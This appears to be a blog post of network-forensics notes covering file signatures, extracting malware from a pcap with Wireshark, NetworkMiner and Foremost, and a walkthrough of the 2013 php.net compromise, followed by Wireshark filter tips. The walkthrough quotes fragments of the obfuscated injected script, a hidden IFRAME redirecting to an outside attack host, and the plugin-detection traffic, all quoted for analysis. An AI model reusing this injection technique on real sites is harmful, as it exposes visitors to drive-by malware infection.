Note: Usually executables in Microsoft systems start from MZ or 4D 5A in HEX.
The MS-DOS MZ executable format is the executable file format used for .EXE files in MS-DOS.
The file can be identified by the ASCII string "MZ" (hexadecimal: 4D 5A) at the
beginning of the file (the "magic number")
Filename extension : .exe
Magic number / file_signatures : MZ or ZM
Type of format : Binary, executable
This is a list of file signatures, data used to identify or verify the content of a file. Such signatures are also known as magic numbers.
List_of_file_signatures: https://en.wikipedia.org/wiki/
Malware Analysis Using WireShark 1:
When we are involved in an incident handling and we are in charge of analyzing a traffic capture in a pcap format related to an attack, one of the things we usually need to do is get the files which were downloaded. The reason is that we need to have a copy of the malware or the exploit to analyze it by reversing engineer or similar.
We usually detect the original sources where these files were downloaded from just analyzing the pcap file, but they disappear in a short period of time from they were originally hosted. Because of that, we will need to extract them directly from the pcap file.
show you three different ways to achieve this goal using the the pcap hosted in Barracuda related to the www.php.net compromise which can be downloaded here:
1. Wireshark is the most popular network protocol analyzer. It is capable of extracting all the files which were downloaded and captured.
If you load the pcap file in you Wireshark and use the command below...
---> http contains "in DOS mode" [seems case sensitive search]
you can check that some executables were downloaded. If you can see some text in pcap like "This Program cannot be run in DOS mode" which means some executables downloaded in your machine.
2. We are able to download all files which were downloaded like executables, pictures, javascripts, etc... by clicking
File --> Export Objects --> HTTP and clicking on "Save all".
3. After saving it in a folder (make sure you are not in your official/critical network, as these files contain virus) list it in a command prompt and which shows you the files which are been recovered.
# ls
use the command below to filter only the executables.
# file * | grep PE32
00000238.exe: PE32 executable (GUI) Intel 80386, for MS Windows
00000426.exe: PE32 executable (GUI) Intel 80386, for MS Windows
00000698.exe: PE32 executable (GUI) Intel 80386, for MS Windows
00000979.exe: PE32 executable (GUI) Intel 80386, for MS Windows
00001561.exe: PE32 executable (console) Intel 80386, for MS Windows
If we upload these files to Virustotal, we check that all of them have been categorized as malicious.
4. Or run #sha256sum or #md5sum against the file and check the hash in VT for more details.
Investigative Process md5sum Lab: http://www.etree.org/md5com.
# md5sum filename
MD5 will only take care about the data of the file. Nothing else.
online hash valuse calculator : will give value of all hashs for the file.
If we change/modify a file content MD5 value also change. If we reverse the change made MD5 valuse also will reverse.
This is with respect to file integrity. No change / Modified
Confidentiality: Here You do want to change. Plain text to cypher text
NetworkMinner
----------------------
NetworkMiner is another Network Forensic Analysis Tool (NFAT) for Windows. Also, it can be installed on Linux using Mono. This tool is a great alternative to Wireshark if you just want to extract the files which were downloaded, look at the sessions, discover the DNS queries or get details about the mails detected from a pcap file.
Foremost
-------------
Foremost is a well known file carving tool.
Foremost is a forensic program to recover lost files based on their headers, footers, and internal data structures. Foremost can work on image files, such as those generated by dd, Safeback, Encase, etc, or directly on a drive. The headers and footers can be specified by a configuration file or you can use command line switches to specify built-in file types. These built-in types look at the data structures of a given file format allowing for a more reliable and faster recovery.
Use Foremost to extract files from a pcap file.
Just downloaded we extract all files from the pcap file, we execute the command below to extract all the files.
# foremost -v -i 5f810408ddbbd6d349b4be4766f41a
Output directory: /root/Desktop/pcap/output
Configuration file: /etc/foremost.conf
Processing: 5f810408ddbbd6d349b4be4766f41a
|-----------------------------
File: 5f810408ddbbd6d349b4be4766f41a
Start: Sat Feb 18 18:23:14 2017
Length: 1 MB (1256656 bytes)
Num Name (bs=512) Size File Offset Comment
0: 00000093.gif 2 KB 47775 (120 x 67)
1: 00000104.gif 61 B 53438 (11 x 11)
2: 00000201.htm 1 KB 103400
3: 00000209.htm 209 B 107474
4: 00000211.htm 11 KB 108304
5: 00000238.exe 87 KB 122358 10/21/2013 23:12:21
6: 00000426.exe 126 KB 218488 10/21/2013 23:20:44
7: 00000698.exe 132 KB 357688 11/06/2012 19:06:55
8: 00000979.exe 233 KB 501404 10/22/2013 19:15:03
9: 00001561.exe 236 KB 799271 10/21/2013 22:15:46
10: 00000103.png 178 B 52913 (197 x 20)
11: 00000103_1.png 207 B 53161 (197 x 20)
*|
Finish: Sat Feb 18 18:23:14 2017
12 FILES EXTRACTED
gif:= 2
htm:= 3
exe:= 5
png:= 2
------------------------------
Foremost finished at Sat Feb 18 18:23:14 2017
# ls
5f810408ddbbd6d349b4be4766f41a
root@kali:~/Desktop/pcap# cd output/
root@kali:~/Desktop/pcap/
audit.txt exe gif htm png
root@kali:~/Desktop/pcap/
root@kali:~/Desktop/pcap/
root@kali:~/Desktop/pcap/
00000238.exe 00000426.exe 00000698.exe 00000979.exe 00001561.exe
root@kali:~/Desktop/pcap/
oot@kali:~/Desktop/pcap/
2bcc5f03e1d63c5fab4aa362f6aecd
647e4bbed78346eccc7c2d12826da5
38bc430e9d8656ee227e48236157e7
15964d7dd9644c8ce29fbcc4585b85
32159b706d1addf63cdb1978291fc7
root@kali:~/Desktop/pcap/
45321f9c1e2ac0a99c0724dde764ba
03305ab862fc83383f8f9482210682
528294f14b868b8e13cc6fd08fa359
f701064c0e436dd2408a580e1711f7
a77f03860762b1bbbdf533a529e98d
Note:
[ But the checksum is different than we got with Wireshark or NetworkMinner.
It seems like Foremost hasn't work well with the pcap file... For this reason I don't usually use it with a pcap file.]
Search for a selection of file types (-t doc,jpg,pdf,xls) in the given image file (-i image.dd):
root@kali:~# foremost -t doc,jpg,pdf,xls -i image.dd
Processing: image.dd
|*|
Xplico
*********
Malware Analysis Using WireShark 2: PHP.net Compromise
http.request.method == "GET" and http.response.code == 200
If we upload the PCAP file to VirusTotal we can see the URLs which were visited by the infected computer in the "File details" section. Or using wireshark filter the traffic. Using GET & success 200 code or using the website name itself.
http.request.method == "GET" and http.host contains "php.net"
http.host=="exact.DomainName.
http.host contains "partial.DomainName.here"
We can see that the www.php.net website was visited. If we open the PCAP file with Wireshark and we look at the "Follow TCP Stream" of the petition www.php.net/userprefs.js we can see the script with the obfuscated code in the picture below. (This malicious code has been removed from the website)
+Sf\x7f5cSe{TdM\x08(tpIf~rId^
\x7f#W2j\x09YvNg\"\x0aTPa\
x0a(Vpi\x16^Xn\x14VPnKL~rHb^
x69\x74",Ud=(0x84^0xc3)*(0xf9-
\x15\xf9\x928\xb4{\xcbV\x00D?
nB=j9="",GC=0;Av=Av[b2[0]](nB)
Anv[VDG("oVkD")](VDG(LUI[VDG("
x64\x65")+"\x41\x74"](0);
The guys from Alienvault have decoded the script. Here they have published the picture below with the code de-ofuscated. We can see an IFRAME with a 10x10px size which redirects the connection to another website was able in the php.net site.
<DIV style="height: 10px; width: 10px; overflow: hidden; position: absolute; left:
<IFRAME src=http://url.whichusb.co.uk/
If we research with Wireshark the link contained in the IFRAME in the picture above, we can see how the code is trying to get the information about the computer. It wants to know if the browser has the Java or AdobeReader plugins installed and enabled.
The next URL where the computer is redirected is /PluginDetect_All.js. In the payload of this connection we can see that the hackers are using PluginDetect in order to detect the browser plugins.
http.request.method == "GET"
check the follow ----> TCP stream option agains the file
PluginDetect_All.js using wireshark. You can see the below scripts in the file
PluginDetect_All.js using wireshark. You can see the below scripts in the file
<script type="text/javascript" src="PluginDetect_All.js"></
var os=PluginDetect.OS
var javaversion=PluginDetect.
var adobe=PluginDetect.getVersion(
</html>GET /PluginDetect_All.js HTTP/1.1
Accept: */*
Referer: http://url.whichusb.co.uk/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: url.whichusb.co.uk
/* PluginDetect v0.7.5 by Eric Gerds www.pinlady.net/PluginDetect [ onWindowLoaded isMinVersion getVersion onDetectionDone getInfo Java(OTF & NOTF)
QT DevalVR Shockwave Flash WMP Silverlight VLC AdobeReader PDFreader(OTF & NOTF) RealPlayer ] *
{b=d.formatNum(d.getNum(t.
{s=false}else{if(j.compare(f,[
{if(d.isGecko&&d.compareNums(
{t=d.insertHTML("object",["
t=d.getDOMobj(t);try{k=d.
k=t?t:b}}}else{k=j.version}j.
In the PCAP file we can see how the computer send a POST connection telling to the website if it has the Java or AdobeReader plugin enabled. Then, the web browser is redirected again.
{try{k=d.getNum(t.
PluginDetect.initScript();POST /stat.htm HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://url.whichusb.co.uk/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Content-Type: application/x-www-form-
Accept-Encoding: gzip, deflate
Host: url.whichusb.co.uk
Content-Length: 14
Connection: Keep-Alive
Cache-Control: no-cache
id=800%7C1%7C1HTTP/1.1 302 Found
Server: nginx/1.0.15
Date: Tue, 22 Oct 2013 21:23:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.3
Expires: Tue, 22 Oct 2013 21:23:14 GMT
Last-Modified: Tue, 22 Oct 2013 21:23:14 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Location: http://aes.whichdigitalphoto.
Content-Length: 0
The next URL which was visited is marked in bold in VirusTotal. This means that the files that were downloaded are categorized as malware by some antivirus engines. Now, the computer is infected. The first network connection that the malware does is to visit a website where there are a javascript that detects the computer location.
GET /app/geoip.js HTTP/1.0
Host: j.maxmind.com
Connection: close
HTTP/1.0 200 OK
Expires: Tue, 22 Oct 2013 19:58:38 GMT
Cache-Control: private, max-age=0
Content-Type: text/javascript; charset=ISO-8859-1
Access-Control-Allow-Origin: *
Content-Length: 512
function geoip_country_code() { return 'US'; }
function geoip_country_name() { return 'United States'; }
function geoip_city() { return 'Campbell'; }
function geoip_region() { return 'CA'; }
function geoip_region_name() { return 'California'; }
function geoip_latitude() { return '37.2803'; }
function geoip_longitude() { return '-121.9567'; }
function geoip_postal_code() { return '95008'; }
function geoip_area_code() { return '408'; }
function geoip_metro_code() { return '807'; }
Conclusion:
If we trust in the PCAP file that Barracuda offers us, we can tell that www.php.net was compromised. The hackers uploaded a javascript to this site which redirects to another one where there was a web plugin detector. Depends of what browser plugins are enabled in the computer, the website could redirects you to a Java or AdobeReader exploit. Then, after exploiting the vulnerability, a trojan that seems to be the ZeroAccess trojan is donwloaded and installed. It seems that this trojan is focused in click-fraud.
[
Packet Viewing :
Packet List Column header ( Packet heading)
Packet List Pane : All packet details
Packet Details pane : Frame / Ethernet / Internet Protocol / Transmission control protocol
Packet Bytes pane : ASCII / HEX
]
Some wireshark filters
1. ip.addr == 10.0.0.1 [Sets a filter for any packet with 10.0.0.1, as either the source or dest]
2. ip.addr == 10.0.0.1 && ip.addr==10.0.0.2 [sets a conversation filter
between the two defined IP addresses]
between the two defined IP addresses]
ip.src
ip.dst
3. http or dns [sets a filter to display all http and dns]
To view only DNS traffic, type udp.port == 53 (lower case) in the
Filter box and press Enter.
To view only DNS traffic, type udp.port == 53 (lower case) in the
Filter box and press Enter.
Select the DNS packet labeled Standard query A
dns and ip.addr==159.25.78.7
dns and ip.dst==159.25.78.7 or dns and ip.src==159.57.78.7
4. tcp.port == 4000
[sets a filter for any TCP packet with 4000 as a source or dest port]
[sets a filter for any TCP packet with 4000 as a source or dest port]
[Filter for specific port]
udp.port
5. tcp.flags.reset==1 [displays all TCP resets]
6. http.request [displays all HTTP GET requests] : check for the request
and response
http.response.code == 200/500/404 7. tcp contains traffic [displays all TCP packets that contain the word ‘traffic’.
and response
http.response.code == 200/500/404 7. tcp contains traffic [displays all TCP packets that contain the word ‘traffic’.
Excellent when searching on a specific string or user ID]
8. !(arp or icmp or dns) [masks out arp, icmp, dns, or whatever other
protocols may be background noise. Allowing you to focus on the traffic of interest]
protocols may be background noise. Allowing you to focus on the traffic of interest]
How we can exclude some of the noise in the trace file
# !(arp or dns or icmp) : This will leave arp,dns,icmp from trace file
and leave the rest. This is called pruning the trace file. 9. udp contains 33:27:58 [sets a filter for the HEX values of 0x33 0x27 0x58 at any offset] 10. tcp.analysis.retransmission [displays all retransmissions in the trace.
Helps when tracking down slow application performance and packet loss]
and leave the rest. This is called pruning the trace file. 9. udp contains 33:27:58 [sets a filter for the HEX values of 0x33 0x27 0x58 at any offset] 10. tcp.analysis.retransmission [displays all retransmissions in the trace.
Helps when tracking down slow application performance and packet loss]
11. I would first filter on the conversation with the nmap target using the
"ip.addr == 10.0.0.1" filter.
Then you could use the SYN/ACK filter to see the connections that are approved by the target. Try this - tcp.flags.syn == 1 && tcp.flags.ack == 1
Any packet with these two bits set as true in the TCP header will be displayed. This will give a list of the open ports.
12. Extract files from pcaps:
http export : You can find this at File > Export > Objects > Http, you will be presented with a list of files found in all the http requests.
The bad thing about this feature is that even with the latest version (1.6.5 at the time of this writing) you still can’t sort by column or apply any filters which makes finding something specific hard.
export bytes : To find this you will have to drill down in the packet you want, depending on the protocol.
Right click > Export selected bytes
The advantage of doing it this way is that you can actually extract files from other protocols other than http (like ftp or smb) and you can use display filters.
Network miner : Network miner is a tool for network analysis but with a focus on forensic analysis.
It can load a pcap and extract files and other data.
Chaosreader : This tool will analyze and extract session information and files and create
an html report you can open in any browser
an html report you can open in any browser
chaosreader http-data.pcap
It will create a lot of files so you may want to launch it inside an empty dir or make a new
one and use the -D option, then you can open index.html
one and use the -D option, then you can open index.html
Refer: https://www.sans.org/reading-
Right Click----> Follow---->TCP Stream
It will bring up the follow tcp stream content if there any content in tcp packet in that stream.
15. Filter for some text / tab name / executable etc
# tcp contains facebook
# udp contains facebook : Which shows all my DNS query for facebook
16. Check for SYN attack
# tcp.flags.syn == 1
# tcp.flags.reset ==1
17. VOIP
# sip && rtp
Add and Customize Columns in WireShark
1. Check in the Packet Details pane. Select the host you want to create..
Right click on it ---> Apply as Column
You can see that host/name as a column in that Packet List Pane
2. Customize Columns :
In the following example I will add another column to the Packet List and will customize this column.
Select a packet in the Packet List pane, that contains the TCP protocol.
Expand Transmission Control Protocol in the Packet Details pane.
Select "Source port: ....".
Right-click and select "Apply as Column" to add the column "Source Port" to the Packet List.
Next right-click the column "Source Port" in the Packet List column header.
Select "Edit Column Details…".
Change the Title "Source Port" to "TCP Port".
Change the Field name "tcp.srcport" to "tcp.port".
As you can see in the following screenshot the TCP source and TCP destination port show up in the same column.
3. Display or Hide Columns :
******************************
No comments:
Post a Comment